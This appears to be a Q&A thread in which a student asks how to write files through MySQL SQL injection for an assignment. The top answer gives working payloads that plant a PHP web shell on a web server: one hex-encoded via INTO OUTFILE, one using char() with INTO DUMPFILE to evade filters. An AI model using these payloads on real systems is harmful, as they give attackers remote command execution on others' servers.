# How do I write files using SQL injection?

Tags: mysql, security, sql-injection

NOTE: The queries are written in a log in form not a url form.

So basically I am trying to perform some sql injections for a university assignemnt. I am trying to write a file and then load the file into the database. My privileges have FILE access and pretty much all privileges. The server that the database is hosting from is external from the computer I am using. However, I have found the path directory of the database to be

```
/var/lib/mysql
```

so I thought then maybe I can write a file to this location doing the following.

```
' UNION SELECT 1, INTO OUTFILE ('/var/lib/mysql/example.txt');-- '
```

However, nothing seems to work.

How do I write a file if the server is not hosted on my computer (i.e. externally) .

Answer (score 3):

yes there are ways you can write to a file using a SQL injection

```sql
' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E-- -
```

so let's break this query a bit. first, we use (') to break out from the original query and then we telling the query to send the output to a file called `shell.php` in `/var/www/html` which is the location for the webserver in my case `(INTO OUTFILE '/var/www/html/shell.php')`

at last, we have some hex characters which decodes to

```html
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>";?>
```

this is actually a good way to bypass some filters, as well as we can avoid messing with quotation marks which can break the query.

also, there are other ways you can write to a file as an example

```sql
'+UNION+ALL+SELECT+'',concat(char(60),'?php+echo+shell_exec($_GET["cmd"])+?',char(62))+INTO+dumpfile+'/var/www/html/test.php'+--+
```

by abusing MySql's `char` command to get around the `</>` limits.

Answer (score 0):

1.looking for the mysql default file path."show variables like '%secure%';" if the 'secure_file_priv' is not "/var/lib/mysql/",into outfile ('/var/lib/mysql/example.txt') disable.into outfile the file path should be 'secure_file_priv' path.

secure_file_priv    /var/lib/mysql-files/
SELECT 1 INTO OUTFILE '/var/lib/mysql-files/example.txt'
2.if OUTFILE exists,[Err] 1086 - File already exists

Comment: So why don't you have commas after the 1 or before the 2?